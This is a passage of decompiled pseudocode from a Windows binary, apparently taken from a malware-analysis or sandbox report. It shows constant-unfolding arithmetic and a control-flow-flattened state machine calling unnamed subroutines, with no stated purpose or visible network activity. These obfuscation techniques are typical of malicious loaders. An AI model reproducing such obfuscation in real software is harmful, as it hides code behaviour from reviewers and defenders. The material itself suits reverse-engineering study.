                                                                                                                                    				_v476 = _v476 ^ 0x01aadd1c;
                                                                                                                                    				_v252 = 0xacd74c;
                                                                                                                                    				_v252 = _v252 + 0xffffc13c;
                                                                                                                                    				_v252 = _v252 ^ 0x00a0cd5e;
                                                                                                                                    				_v232 = 0x48ff42;
                                                                                                                                    				_t1205 = 0x1a;
                                                                                                                                    				_v232 = _v232 / _t1205;
                                                                                                                                    				_v232 = _v232 ^ 0x0005b06f;
                                                                                                                                    				_v620 = 0x68b0f8;
                                                                                                                                    				_v620 = _v620 | 0x9e72bceb;
                                                                                                                                    				_v620 = _v620 ^ 0x53ebce50;
                                                                                                                                    				_v620 = _v620 + 0x60e9;
                                                                                                                                    				_v620 = _v620 ^ 0xcd9386df;
                                                                                                                                    				_v572 = 0xa5dd6d;
                                                                                                                                    				_v572 = _v572 << 0xb;
                                                                                                                                    				_t1206 = 0x6b;
                                                                                                                                    				_v572 = _v572 / _t1206;
                                                                                                                                    				_v572 = _v572 + 0xe547;
                                                                                                                                    				_v572 = _v572 ^ 0x00701f50;
                                                                                                                                    				_v516 = 0x27ee1e;
                                                                                                                                    				_v516 = _v516 + 0x5114;
                                                                                                                                    				_v516 = _v516 ^ 0xd07a9b41;
                                                                                                                                    				_v516 = _v516 ^ 0x4a8a2a52;
                                                                                                                                    				_v516 = _v516 ^ 0x9ad4de84;
                                                                                                                                    				_v484 = 0xc04b63;
                                                                                                                                    				_v484 = _v484 >> 3;
                                                                                                                                    				_v484 = _v484 >> 4;
                                                                                                                                    				_v484 = _v484 + 0xffff6956;
                                                                                                                                    				_v484 = _v484 ^ 0x000f5fa9;
                                                                                                                                    				_v416 = 0x10eb88;
                                                                                                                                    				_v416 = _v416 | 0xd8fa91ef;
                                                                                                                                    				_v416 = _v416 ^ 0xf957ef44;
                                                                                                                                    				_v416 = _v416 ^ 0x21a34ff6;
                                                                                                                                    				_v412 = 0xf4f2f5;
                                                                                                                                    				_v412 = _v412 + 0xffff8ffc;
                                                                                                                                    				_v412 = _v412 + 0xffff7090;
                                                                                                                                    				_v412 = _v412 ^ 0x00f029cf;
                                                                                                                                    				_v268 = 0xc7943e;
                                                                                                                                    				_v268 = _v268 << 0x10;
                                                                                                                                    				_v268 = _v268 ^ 0x94371f3e;
                                                                                                                                    				_v544 = 0x509d95;
                                                                                                                                    				_v544 = _v544 >> 0xa;
                                                                                                                                    				_v544 = _v544 >> 0xf;
                                                                                                                                    				_v544 = _v544 >> 0xa;
                                                                                                                                    				_v544 = _v544 ^ 0x0008d406;
                                                                                                                                    				_v552 = 0x34f7be;
                                                                                                                                    				_v552 = _v552 / _t1190;
                                                                                                                                    				_v552 = _v552 >> 0x10;
                                                                                                                                    				_v552 = _v552 >> 5;
                                                                                                                                    				_v552 = _v552 ^ 0x0008c95b;
                                                                                                                                    				_v404 = 0x94eb91;
                                                                                                                                    				_v404 = _v404 ^ 0x41984e3b;
                                                                                                                                    				_v404 = _v404 << 3;
                                                                                                                                    				_v404 = _v404 ^ 0x08661611;
                                                                                                                                    				_v220 = 0x500384;
                                                                                                                                    				_v220 = _v220 ^ 0xbbdae5ed;
                                                                                                                                    				_v220 = _v220 ^ 0xbb8779fc;
                                                                                                                                    				_v448 = 0x89f4a;
                                                                                                                                    				_t1207 = 0x66;
                                                                                                                                    				_v448 = _v448 * 0x78;
                                                                                                                                    				_v448 = _v448 / _t1313;
                                                                                                                                    				_v448 = _v448 ^ 0x000df59a;
                                                                                                                                    				_v292 = 0x19f8d0;
                                                                                                                                    				_v292 = _v292 >> 0xf;
                                                                                                                                    				_v292 = _v292 ^ 0x0007f69a;
                                                                                                                                    				_v616 = 0x49d3c1;
                                                                                                                                    				_v616 = _v616 | 0x94d46b10;
                                                                                                                                    				_v616 = _v616 >> 0xe;
                                                                                                                                    				_v616 = _v616 | 0x382c489e;
                                                                                                                                    				_v616 = _v616 ^ 0x382cb35c;
                                                                                                                                    				_v440 = 0x57429d;
                                                                                                                                    				_v440 = _v440 << 0x10;
                                                                                                                                    				_v440 = _v440 + 0x8d95;
                                                                                                                                    				_v440 = _v440 ^ 0x429b4669;
                                                                                                                                    				_v612 = 0x469ad0;
                                                                                                                                    				_v612 = _v612 ^ 0xa9c1a766;
                                                                                                                                    				_v612 = _v612 | 0x8fd1d886;
                                                                                                                                    				_v612 = _v612 << 1;
                                                                                                                                    				_v612 = _v612 ^ 0x5faedd57;
                                                                                                                                    				_v244 = 0xe276bf;
                                                                                                                                    				_v244 = _v244 * 0x1a;
                                                                                                                                    				_v244 = _v244 ^ 0x170afa50;
                                                                                                                                    				_v352 = 0x60bcf5;
                                                                                                                                    				_v352 = _v352 + 0xf9c7;
                                                                                                                                    				_v352 = _v352 ^ 0xebf612c1;
                                                                                                                                    				_v352 = _v352 ^ 0xeb9276cf;
                                                                                                                                    				_v488 = 0xa1517b;
                                                                                                                                    				_v488 = _v488 / _t1207;
                                                                                                                                    				_t1208 = 0x68;
                                                                                                                                    				_v488 = _v488 * 0x65;
                                                                                                                                    				_v488 = _v488 >> 0xc;
                                                                                                                                    				_v488 = _v488 ^ 0x00034996;
                                                                                                                                    				_v388 = 0x73cbfd;
                                                                                                                                    				_v388 = _v388 << 5;
                                                                                                                                    				_v388 = _v388 / _t1208;
                                                                                                                                    				_v388 = _v388 ^ 0x002375e2;
                                                                                                                                    				_v480 = 0x418d4e;
                                                                                                                                    				_v480 = _v480 + 0xffffa3b5;
                                                                                                                                    				_v480 = _v480 + 0x7686;
                                                                                                                                    				_v480 = _v480 << 6;
                                                                                                                                    				_v480 = _v480 ^ 0x106d4c13;
                                                                                                                                    				_v380 = 0xc2a320;
                                                                                                                                    				_t1209 = 0x12;
                                                                                                                                    				_v380 = _v380 / _t1209;
                                                                                                                                    				_t1210 = 0x3b;
                                                                                                                                    				_v380 = _v380 * 0x3d;
                                                                                                                                    				_v380 = _v380 ^ 0x02970ee8;
                                                                                                                                    				_v272 = 0xffa302;
                                                                                                                                    				_v272 = _v272 << 0xb;
                                                                                                                                    				_v272 = _v272 ^ 0xfd1abd55;
                                                                                                                                    				_v280 = 0x15da71;
                                                                                                                                    				_v280 = _v280 | 0xb4bf3799;
                                                                                                                                    				_v280 = _v280 ^ 0xb4b9b38f;
                                                                                                                                    				_v364 = 0xb2440c;
                                                                                                                                    				_v364 = _v364 >> 0xb;
                                                                                                                                    				_v364 = _v364 ^ 0x4809a963;
                                                                                                                                    				_v364 = _v364 ^ 0x4806c3ec;
                                                                                                                                    				_v472 = 0xfa5982;
                                                                                                                                    				_v472 = _v472 * 0x42;
                                                                                                                                    				_v472 = _v472 | 0xea19613e;
                                                                                                                                    				_v472 = _v472 + 0x3c8a;
                                                                                                                                    				_v472 = _v472 ^ 0xea9293e6;
                                                                                                                                    				_v464 = 0xd5ed68;
                                                                                                                                    				_v464 = _v464 << 3;
                                                                                                                                    				_v464 = _v464 << 0x10;
                                                                                                                                    				_v464 = _v464 << 0xc;
                                                                                                                                    				_v464 = _v464 ^ 0x00064bb9;
                                                                                                                                    				_v240 = 0xe6b6f4;
                                                                                                                                    				_v240 = _v240 + 0xffffaad8;
                                                                                                                                    				_v240 = _v240 ^ 0x00e3249b;
                                                                                                                                    				_v360 = 0x591b06;
                                                                                                                                    				_v360 = _v360 / _t1210;
                                                                                                                                    				_v360 = _v360 ^ 0x000e8e51;
                                                                                                                                    				_v456 = 0xd9b586;
                                                                                                                                    				_v456 = _v456 << 7;
                                                                                                                                    				_t1211 = 0x77;
                                                                                                                                    				_v456 = _v456 / _t1211;
                                                                                                                                    				_v456 = _v456 ^ 0x2d3aa422;
                                                                                                                                    				_v456 = _v456 ^ 0x2dd2b0e0;
                                                                                                                                    				_v468 = 0xee071b;
                                                                                                                                    				_t1212 = 0x17;
                                                                                                                                    				_v468 = _v468 / _t1212;
                                                                                                                                    				_v468 = _v468 + 0xffff215c;
                                                                                                                                    				_t1213 = 0x1e;
                                                                                                                                    				_v468 = _v468 / _t1213;
                                                                                                                                    				_v468 = _v468 ^ 0x01343549;
                                                                                                                                    				_v508 = 0x51d736;
                                                                                                                                    				_v508 = _v508 ^ 0xe0f7e333;
                                                                                                                                    				_v508 = _v508 ^ 0x46175d01;
                                                                                                                                    				_v508 = _v508 << 0xb;
                                                                                                                                    				_v508 = _v508 ^ 0x8b480710;
                                                                                                                                    				_v332 = 0x8a6fa0;
                                                                                                                                    				_v332 = _v332 << 4;
                                                                                                                                    				_v332 = _v332 * 0x66;
                                                                                                                                    				_v332 = _v332 ^ 0x72879c01;
                                                                                                                                    				_v436 = 0x22afa8;
                                                                                                                                    				_v436 = _v436 ^ 0xb7db44c6;
                                                                                                                                    				_v436 = _v436 + 0x54fa;
                                                                                                                                    				_v436 = _v436 ^ 0xb7fa4fc8;
                                                                                                                                    				_v584 = 0x2b296e;
                                                                                                                                    				_t833 =  &_v584; // 0x2b296e
                                                                                                                                    				_t1214 = 0x7d;
                                                                                                                                    				_t1314 = _v360;
                                                                                                                                    				_v584 =  *_t833 * 0x69;
                                                                                                                                    				_v584 = _v584 ^ 0x4f8ca6ed;
                                                                                                                                    				_v584 = _v584 + 0xffff6423;
                                                                                                                                    				_v584 = _v584 ^ 0x5e3ea256;
                                                                                                                                    				_v564 = 0x8d053b;
                                                                                                                                    				_t1191 = _v360;
                                                                                                                                    				_v564 = _v564 * 0x58;
				_v564 = _v564 >> 0xa;
				_v564 = _v564 / _t1214;
				_v564 = _v564 ^ 0x000da371;
				_v208 = 0xe7280f;
				_v208 = _v208 << 4;
				_v208 = _v208 ^ 0x0e7f3b50;
				_v308 = 0xd716a5;
				_v308 = _v308 << 6;
				_v308 = _v308 ^ 0x35cb5d60;
				_v260 = 0x2bcd88;
				_t1215 = 0x69;
				_v260 = _v260 * 0x56;
				_v260 = _v260 ^ 0x0eb9ff90;
				_v536 = 0x561f85;
				_v536 = _v536 + 0x28c2;
				_v536 = _v536 ^ 0x7eb81cd4;
				_v536 = _v536 + 0xfffffcfb;
				_v536 = _v536 ^ 0x7eee24be;
				_v528 = 0xd9e61a;
				_v528 = _v528 | 0x5cf69c57;
				_v528 = _v528 / _t1215;
				_v528 = _v528 * 0x70;
				_v528 = _v528 ^ 0x6333db70;
				goto L1;
				do {
					while(1) {
						L1:
						_t1348 = _t1317 - 0x6397bd0;
						if(_t1348 > 0) {
							break;
						}
						if(_t1348 == 0) {
							E002D66CA();
							_t1317 = 0x525d695;
							continue;
						}
						_t1349 = _t1317 - 0x3d71c3c;
						if(_t1349 > 0) {
							__eflags = _t1317 - 0x525d695;
							if(__eflags > 0) {
								__eflags = _t1317 - 0x53c3717;
								if(_t1317 == 0x53c3717) {
									_t1118 = E002D1FFB();
									__eflags = _t1118;
									if(_t1118 == 0) {
										_t1125 = E002E0056();
									}
									L27:
									_t1317 = 0xc4dcd;
									continue;
								}
								__eflags = _t1317 - 0x56efd44;
								if(_t1317 == 0x56efd44) {
									E002D95FA();
									_t1122 = E002D1FFB();
									asm("sbb esi, esi");
									_t1317 = ( ~_t1122 & 0xfebaa250) + 0x8c1c67e;
									continue;
								}
								__eflags = _t1317 - 0x5d794ec;
								if(_t1317 == 0x5d794ec) {
									_t1317 = 0xd7f216f;
									continue;
								}
								__eflags = _t1317 - 0x5dcd6da;
								if(_t1317 != 0x5dcd6da) {
									goto L109;
								}
								_t1125 = E002DC110(_v336,  &_v152, _v400, _v368);
								_t1317 = 0x6eeee91;
								continue;
							}
							if(__eflags == 0) {
								_t1125 = E002C59F2();
								__eflags = _t1125;
								if(_t1125 == 0) {
									L114:
									return _t1125;
								}
								_t1317 = 0x56efd44;
								continue;
							}
							__eflags = _t1317 - 0x3fc5519;
							if(_t1317 == 0x3fc5519) {
								_v144 = E002D20B0();
								_t1125 = E002D1DDD(_v452, _t1152, _v636, _v224);
								_pop(_t1237);
								_v140 = _t1125;
								_t1317 = 0xa74297b;
								continue;
							}
							__eflags = _t1317 - 0x42dc4f0;
							if(_t1317 == 0x42dc4f0) {
								_t1125 = _v468;
								_t1317 = 0x4cdd8ae;
								_v112 = _t1125;
								continue;
							}
							__eflags = _t1317 - 0x4a24b69;
							if(_t1317 == 0x4a24b69) {
								_t1125 = E002D0326();
								_t1317 = 0x8690ed6;
								continue;
							}
							__eflags = _t1317 - 0x4cdd8ae;
							if(_t1317 != 0x4cdd8ae) {
								goto L109;
							}
							_t1125 = _v508;
							_t1317 = 0x5dcd6da;
							_v124 = _t1125;
							continue;
						}
						if(_t1349 == 0) {
							E002D8519(_v244, _v352, _v188);
							L34:
							_t1317 = 0xe4333b3;
							continue;
						}
						_t1350 = _t1317 - 0x27d9d92;
						if(_t1350 > 0) {
							__eflags = _t1317 - 0x2a998d8;
							if(_t1317 == 0x2a998d8) {
								_t1124 = E002C1A56( &_v180,  &_v84, _v572, _v516);
								__eflags = _t1124;
								if(_t1124 != 0) {
									_t1125 = _v28;
									__eflags = _t1125 - 8;
									if(_t1125 != 8) {
										__eflags = _t1125;
										if(_t1125 == 0) {
											L32:
											_t1317 = 0xa65551a;
											continue;
										}
										__eflags = _t1125 - 1;
										if(_t1125 != 1) {
											goto L27;
										}
										goto L32;
									}
									_t1317 = 0xc1a4fe5;
									continue;
								}
								_t1125 = E002D0AE0(_v308, _v564);
								_pop(_t1237);
								_t1314 = _t1125;
								_t1191 = 0x5dcd6da;
								goto L27;
							}
							__eflags = _t1317 - 0x2cf0ed0;
							if(_t1317 == 0x2cf0ed0) {
								_t1125 = E002DCB5B(_v340, _v248, _v348, _v356);
								goto L114;
							}
							__eflags = _t1317 - 0x3250d84;
							if(__eflags == 0) {
								_v196 = E002D7BA6( &_v192, _v596, __eflags, _v492, 0x2c1444);
								_v204 = E002D7BA6( &_v200, _v316, __eflags, _v344, 0x2c14b4);
								_t1130 = E002C5361(_v460, _v524,  &_v196,  &_v204);
								_t1345 = _t1345 + 0x1c;
								asm("sbb esi, esi");
								_t1317 = ( ~_t1130 & 0xfa5ce13e) + 0xccbb739;
								E002CA8B0(_v376, _v204, _v424);
								_t1125 = E002CA8B0(_v580, _v196, _v328);
								goto L109;
							}
							__eflags = _t1317 - 0x3ace1b1;
							if(_t1317 != 0x3ace1b1) {
								goto L109;
							}
							_t1125 = E002D473C();
							_t1317 = 0xc245297;
							continue;
						}
						if(_t1350 == 0) {
							_t1141 = E002D4116();
							__eflags = _t1141;
							if(_t1141 == 0) {
								_t1125 = E002D1FFB();
								asm("sbb esi, esi");
								_t1317 = ( ~_t1125 & 0xf7888f1a) + 0xc245297;
							} else {
								_t1125 = E002D1FFB();
								asm("sbb esi, esi");
								_t1317 = ( ~_t1125 & 0x013fceb9) + 0xc7d9b3b;
							}
							continue;
						}
						if(_t1317 == 0xc4dcd) {
							_t1125 = E002D8519(_v440, _v612, _v180);
							_t1317 = 0x3d71c3c;
							continue;
						}
						if(_t1317 == 0x283259) {
							_t1125 = E002C64E2(_v476, _v332, _v252,  &_v188, E002C4E74(), _v232, _v620,  &_v180);
							_t1345 = _t1345 + 0x18;
							asm("sbb esi, esi");
							_t1317 = ( ~_t1125 & 0x0281667f) + 0x283259;
							continue;
						}
						if(_t1317 == 0x1b53ec1) {
							_t1125 = E002D87D1();
							_v104 = _t1125;
							_t1317 = 0xfa2c753;
							continue;
						}
						if(_t1317 != 0x1f27ca8) {
							goto L109;
						}
						_t1125 = E002D20BA();
						if(_t1125 == 0) {
							goto L114;
						} else {
							_t1317 = 0xa7d0a44;
							continue;
						}
					}
					__eflags = _t1317 - 0xa7d0a44;
					if(__eflags > 0) {
						__eflags = _t1317 - 0xd7f216f;
						if(__eflags > 0) {
							__eflags = _t1317 - 0xdbd69f4;
							if(_t1317 == 0xdbd69f4) {
								_t1114 = E002D9BCF();
								__eflags = _t1114;
								if(_t1114 != 0) {
									L85:
									_t1317 = 0x2cf0ed0;
                                                                                                                                    									goto L1;
                                                                                                                                    								}
                                                                                                                                    								_t1317 = 0xc7d9b3b;
                                                                                                                                    								goto L109;
                                                                                                                                    							}
                                                                                                                                    							__eflags = _t1317 - 0xe4333b3;
                                                                                                                                    							if(_t1317 == 0xe4333b3) {
                                                                                                                                    								__eflags = _t1314 - _v288;
                                                                                                                                    								if(_t1314 == _v288) {
                                                                                                                                    									L106:
                                                                                                                                    									_t1317 = _t1191;
                                                                                                                                    									goto L109;
                                                                                                                                    								}
                                                                                                                                    								_t1134 = E002C4E74();
                                                                                                                                    								_t1237 = _v480;
                                                                                                                                    								_t1125 = E002C8DC4(_v480, _v380, _v272, _v280, _t1134, _t1314);
                                                                                                                                    								_t1345 = _t1345 + 0x10;
                                                                                                                                    								__eflags = _t1125 - _v372;
                                                                                                                                    								if(_t1125 == _v372) {
                                                                                                                                    									_t1125 = E002C6D24();
                                                                                                                                    									goto L106;
                                                                                                                                    								}
                                                                                                                                    								_t1317 = 0x942db73;
                                                                                                                                    								goto L1;
                                                                                                                                    							}
                                                                                                                                    							__eflags = _t1317 - 0xfa2c753;
                                                                                                                                    							if(_t1317 != 0xfa2c753) {
                                                                                                                                    								goto L109;
                                                                                                                                    							}
                                                                                                                                    							_t1125 = E002DD2CE(_t1237);
                                                                                                                                    							_v172 = _t1125;
                                                                                                                                    							_t1317 = 0x42dc4f0;
                                                                                                                                    							goto L1;
                                                                                                                                    						}
                                                                                                                                    						if(__eflags == 0) {
                                                                                                                                    							_t1125 = E002D7D48(_t1237, __eflags);
                                                                                                                                    							__eflags = _t1125;
                                                                                                                                    							if(_t1125 == 0) {
                                                                                                                                    								goto L114;
                                                                                                                                    							}
                                                                                                                                    							_t1317 = 0x4a24b69;
                                                                                                                                    							goto L1;
                                                                                                                                    						}
                                                                                                                                    						__eflags = _t1317 - 0xb2497b0;
                                                                                                                                    						if(_t1317 == 0xb2497b0) {
                                                                                                                                    							_t1125 = E002CDFF3();
                                                                                                                                    							_t1317 = 0x3250d84;
                                                                                                                                    							goto L1;
                                                                                                                                    						}
                                                                                                                                    						__eflags = _t1317 - 0xc1a4fe5;
                                                                                                                                    						if(_t1317 == 0xc1a4fe5) {
                                                                                                                                    							_t1125 = E002D7DD5();
                                                                                                                                    							goto L114;
                                                                                                                                    						}
                                                                                                                                    						__eflags = _t1317 - 0xc245297;
                                                                                                                                    						if(_t1317 == 0xc245297) {
                                                                                                                                    							_t1125 = E002D8BE3();
                                                                                                                                    							_t1317 = 0x6397bd0;
                                                                                                                                    							goto L1;
                                                                                                                                    						}
                                                                                                                                    						__eflags = _t1317 - 0xc7d9b3b;
                                                                                                                                    						if(_t1317 != 0xc7d9b3b) {
                                                                                                                                    							goto L109;
                                                                                                                                    						}
                                                                                                                                    						_t1125 = E002C51BB();
                                                                                                                                    						_t1317 = 0xb2497b0;
                                                                                                                                    						goto L1;
                                                                                                                                    					}
                                                                                                                                    					if(__eflags == 0) {
                                                                                                                                    						_t1125 = E002D9EEC();
                                                                                                                                    						asm("sbb esi, esi");
                                                                                                                                    						_t1317 = ( ~_t1125 & 0x03bbde3e) + 0x27d9d92;
                                                                                                                                    						goto L1;
                                                                                                                                    					}
                                                                                                                                    					__eflags = _t1317 - 0x8955e2f;
                                                                                                                                    					if(__eflags > 0) {
                                                                                                                                    						__eflags = _t1317 - 0x8c1c67e;
                                                                                                                                    						if(_t1317 == 0x8c1c67e) {
                                                                                                                                    							_t1125 = E002D1EE7();
                                                                                                                                    							goto L85;
                                                                                                                                    						}
                                                                                                                                    						__eflags = _t1317 - 0x942db73;
                                                                                                                                    						if(_t1317 == 0x942db73) {
                                                                                                                                    							_t1125 = E002C91B0(_t1237);
                                                                                                                                    							goto L114;
                                                                                                                                    						}
                                                                                                                                    						__eflags = _t1317 - 0xa65551a;
                                                                                                                                    						if(_t1317 == 0xa65551a) {
                                                                                                                                    							_t1125 = E002CB2C7(_v412, _v268,  &_v36);
                                                                                                                                    							_pop(_t1237);
                                                                                                                                    							__eflags = _t1125;
                                                                                                                                    							if(_t1125 == 0) {
                                                                                                                                    								_t1125 = _v28;
                                                                                                                                    								__eflags = _t1125;
                                                                                                                                    								if(_t1125 == 0) {
                                                                                                                                    									_t1314 = E002D0AE0(_v260, _v208);
                                                                                                                                    									_t1125 = _v28;
                                                                                                                                    									_pop(_t1237);
                                                                                                                                    								}
                                                                                                                                    								__eflags = _t1125 - 1;
                                                                                                                                    								if(_t1125 == 1) {
                                                                                                                                    									_t1125 = E002D0AE0(_v528, _v536);
                                                                                                                                    									_pop(_t1237);
                                                                                                                                    									_t1314 = _t1125;
                                                                                                                                    								}
                                                                                                                                    							} else {
                                                                                                                                    								_t1314 = _v560;
                                                                                                                                    							}
                                                                                                                                    							_t1191 = 0x5dcd6da;
                                                                                                                                    							_t1317 = 0x53c3717;
                                                                                                                                    							goto L1;
                                                                                                                                    						}
                                                                                                                                    						__eflags = _t1317 - 0xa74297b;
                                                                                                                                    						if(_t1317 != 0xa74297b) {
                                                                                                                                    							goto L109;
                                                                                                                                    						}
                                                                                                                                    						_t1125 = E002C75F1();
                                                                                                                                    						_v100 = _t1125;
                                                                                                                                    						_t1317 = 0x1b53ec1;
                                                                                                                                    						goto L1;
                                                                                                                                    					}
                                                                                                                                    					if(__eflags == 0) {
                                                                                                                                    						_t1125 = E002DE1D4();
                                                                                                                                    						__eflags = _t1125;
                                                                                                                                    						if(_t1125 == 0) {
                                                                                                                                    							goto L114;
                                                                                                                                    						}
                                                                                                                                    						_t1317 = 0x1f27ca8;
                                                                                                                                    						goto L1;
                                                                                                                                    					}
                                                                                                                                    					__eflags = _t1317 - 0x6eeee91;
                                                                                                                                    					if(_t1317 == 0x6eeee91) {
                                                                                                                                    						_t1237 = _v276;
                                                                                                                                    						_t1125 = E002C2251(_v276,  &_v188,  &_v172, _v420, _v428);
                                                                                                                                    						_t1345 = _t1345 + 0xc;
                                                                                                                                    						asm("sbb esi, esi");
                                                                                                                                    						_t1317 = ( ~_t1125 & 0xfc51161d) + 0x3d71c3c;
                                                                                                                                    						goto L1;
                                                                                                                                    					}
                                                                                                                                    					__eflags = _t1317 - 0x7289877;
                                                                                                                                    					if(_t1317 == 0x7289877) {
                                                                                                                                    						E002DE1D4();
                                                                                                                                    						_t1191 = 0x3fc5519;
                                                                                                                                    						_t1125 = E002D0AE0(_v584, _v436);
                                                                                                                                    						_t1314 = _t1125;
                                                                                                                                    						goto L34;
                                                                                                                                    					}
                                                                                                                                    					__eflags = _t1317 - 0x77c68ce;
                                                                                                                                    					if(_t1317 == 0x77c68ce) {
                                                                                                                                    						_t1125 = E002D5CC4();
                                                                                                                                    						_t1317 = 0x8c1c67e;
                                                                                                                                    						goto L1;
                                                                                                                                    					}
                                                                                                                                    					__eflags = _t1317 - 0x8690ed6;
                                                                                                                                    					if(_t1317 != 0x8690ed6) {
                                                                                                                                    						goto L109;
                                                                                                                                    					}
                                                                                                                                    					_t1125 = E002D044F();
                                                                                                                                    					__eflags = _t1125;
                                                                                                                                    					if(_t1125 == 0) {
                                                                                                                                    						goto L114;
                                                                                                                                    					}
                                                                                                                                    					_t1317 = 0x8955e2f;
                                                                                                                                    					goto L1;
                                                                                                                                    					L109:
                                                                                                                                    					__eflags = _t1317 - 0xccbb739;
                                                                                                                                    				} while (_t1317 != 0xccbb739);
                                                                                                                                    				goto L114;
                                                                                                                                    			}
                                                                                                                                    0x002d26b7
                                                                                                                                    0x002d26bf
                                                                                                                                    0x002d26cb
                                                                                                                                    0x002d26ce
                                                                                                                                    0x002d26d2
                                                                                                                                    0x002d26da
                                                                                                                                    0x002d26e2
                                                                                                                                    0x002d26e7
                                                                                                                                    0x002d26ef
                                                                                                                                    0x002d26f4
                                                                                                                                    0x002d26fc
                                                                                                                                    0x002d2704
                                                                                                                                    0x002d2711
                                                                                                                                    0x002d2715
                                                                                                                                    0x002d271d
                                                                                                                                    0x002d2725
                                                                                                                                    0x002d2730
                                                                                                                                    0x002d2738
                                                                                                                                    0x002d274b
                                                                                                                                    0x002d2752
                                                                                                                                    0x002d275d
                                                                                                                                    0x002d2768
                                                                                                                                    0x002d2770
                                                                                                                                    0x002d2778
                                                                                                                                    0x002d2780
                                                                                                                                    0x002d278b
                                                                                                                                    0x002d2793
                                                                                                                                    0x002d279d
                                                                                                                                    0x002d27a2
                                                                                                                                    0x002d27a7
                                                                                                                                    0x002d27af
                                                                                                                                    0x002d27b7
                                                                                                                                    0x002d27bc
                                                                                                                                    0x002d27c4
                                                                                                                                    0x002d27cc
                                                                                                                                    0x002d27d4
                                                                                                                                    0x002d27e9
                                                                                                                                    0x002d27ec
                                                                                                                                    0x002d27ed
                                                                                                                                    0x002d27fe
                                                                                                                                    0x002d2805
                                                                                                                                    0x002d2810
                                                                                                                                    0x002d281b
                                                                                                                                    0x002d2826
                                                                                                                                    0x002d2831
                                                                                                                                    0x002d283c
                                                                                                                                    0x002d2847
                                                                                                                                    0x002d2852
                                                                                                                                    0x002d285d
                                                                                                                                    0x002d2865
                                                                                                                                    0x002d2870
                                                                                                                                    0x002d287b
                                                                                                                                    0x002d2886
                                                                                                                                    0x002d2891
                                                                                                                                    0x002d289c
                                                                                                                                    0x002d28a4
                                                                                                                                    0x002d28ac
                                                                                                                                    0x002d28bc
                                                                                                                                    0x002d28c0
                                                                                                                                    0x002d28c8
                                                                                                                                    0x002d28d8
                                                                                                                                    0x002d28dc
                                                                                                                                    0x002d28e4
                                                                                                                                    0x002d28ec
                                                                                                                                    0x002d28f4
                                                                                                                                    0x002d28fc
                                                                                                                                    0x002d2901
                                                                                                                                    0x002d2906
                                                                                                                                    0x002d290e
                                                                                                                                    0x002d2916
                                                                                                                                    0x002d2928
                                                                                                                                    0x002d292d
                                                                                                                                    0x002d2936
                                                                                                                                    0x002d2941
                                                                                                                                    0x002d294c
                                                                                                                                    0x002d295f
                                                                                                                                    0x002d2960
                                                                                                                                    0x002d2967
                                                                                                                                    0x002d2972
                                                                                                                                    0x002d2985
                                                                                                                                    0x002d298c
                                                                                                                                    0x002d2997
                                                                                                                                    0x002d29ab
                                                                                                                                    0x002d29b2
                                                                                                                                    0x002d29ba
                                                                                                                                    0x002d29c5
                                                                                                                                    0x002d29d0
                                                                                                                                    0x002d29e7
                                                                                                                                    0x002d29ea
                                                                                                                                    0x002d29f1
                                                                                                                                    0x002d29fc
                                                                                                                                    0x002d2a07
                                                                                                                                    0x002d2a12
                                                                                                                                    0x002d2a1d
                                                                                                                                    0x002d2a28
                                                                                                                                    0x002d2a33
                                                                                                                                    0x002d2a3b
                                                                                                                                    0x002d2a46
                                                                                                                                    0x002d2a51
                                                                                                                                    0x002d2a64
                                                                                                                                    0x002d2a6b
                                                                                                                                    0x002d2a72
                                                                                                                                    0x002d2a7d
                                                                                                                                    0x002d2a93
                                                                                                                                    0x002d2a9a
                                                                                                                                    0x002d2aa5
                                                                                                                                    0x002d2ab8
                                                                                                                                    0x002d2abb
                                                                                                                                    0x002d2ac2
                                                                                                                                    0x002d2aca
                                                                                                                                    0x002d2ad5
                                                                                                                                    0x002d2add
                                                                                                                                    0x002d2ae2
                                                                                                                                    0x002d2aea
                                                                                                                                    0x002d2af2
                                                                                                                                    0x002d2b05
                                                                                                                                    0x002d2b0c
                                                                                                                                    0x002d2b17
                                                                                                                                    0x002d2b1f
                                                                                                                                    0x002d2b2a
                                                                                                                                    0x002d2b35
                                                                                                                                    0x002d2b3d
                                                                                                                                    0x002d2b48
                                                                                                                                    0x002d2b53
                                                                                                                                    0x002d2b5a
                                                                                                                                    0x002d2b65
                                                                                                                                    0x002d2b70
                                                                                                                                    0x002d2b83
                                                                                                                                    0x002d2b8a
                                                                                                                                    0x002d2ba0
                                                                                                                                    0x002d2ba7
                                                                                                                                    0x002d2bb2
                                                                                                                                    0x002d2bba
                                                                                                                                    0x002d2bc2
                                                                                                                                    0x002d2bca
                                                                                                                                    0x002d2bcf
                                                                                                                                    0x002d2bd7
                                                                                                                                    0x002d2bea
                                                                                                                                    0x002d2beb
                                                                                                                                    0x002d2bfa
                                                                                                                                    0x002d2c01
                                                                                                                                    0x002d2c08
                                                                                                                                    0x002d2c13
                                                                                                                                    0x002d2c1e
                                                                                                                                    0x002d2c26
                                                                                                                                    0x002d2c31
                                                                                                                                    0x002d2c3c
                                                                                                                                    0x002d2c47
                                                                                                                                    0x002d2c58
                                                                                                                                    0x002d2c5f
                                                                                                                                    0x002d2c6c
                                                                                                                                    0x002d2c74
                                                                                                                                    0x002d2c7c
                                                                                                                                    0x002d2c86
                                                                                                                                    0x002d2c8b
                                                                                                                                    0x002d2c91
                                                                                                                                    0x002d2c99
                                                                                                                                    0x002d2ca4
                                                                                                                                    0x002d2caf
                                                                                                                                    0x002d2cba
                                                                                                                                    0x002d2ccd
                                                                                                                                    0x002d2cce
                                                                                                                                    0x002d2cd5
                                                                                                                                    0x002d2ce0
                                                                                                                                    0x002d2cf3
                                                                                                                                    0x002d2cfa
                                                                                                                                    0x002d2d05
                                                                                                                                    0x002d2d10
                                                                                                                                    0x002d2d1e
                                                                                                                                    0x002d2d22
                                                                                                                                    0x002d2d2a
                                                                                                                                    0x002d2d2f
                                                                                                                                    0x002d2d37
                                                                                                                                    0x002d2d42
                                                                                                                                    0x002d2d4a
                                                                                                                                    0x002d2d55
                                                                                                                                    0x002d2d5d
                                                                                                                                    0x002d2d62
                                                                                                                                    0x002d2d67
                                                                                                                                    0x002d2d6f
                                                                                                                                    0x002d2d77
                                                                                                                                    0x002d2d82
                                                                                                                                    0x002d2d8d
                                                                                                                                    0x002d2d98
                                                                                                                                    0x002d2da3
                                                                                                                                    0x002d2dab
                                                                                                                                    0x002d2db3
                                                                                                                                    0x002d2dbc
                                                                                                                                    0x002d2dc0
                                                                                                                                    0x002d2dc8
                                                                                                                                    0x002d2dd3
                                                                                                                                    0x002d2dde
                                                                                                                                    0x002d2de9
                                                                                                                                    0x002d2df4
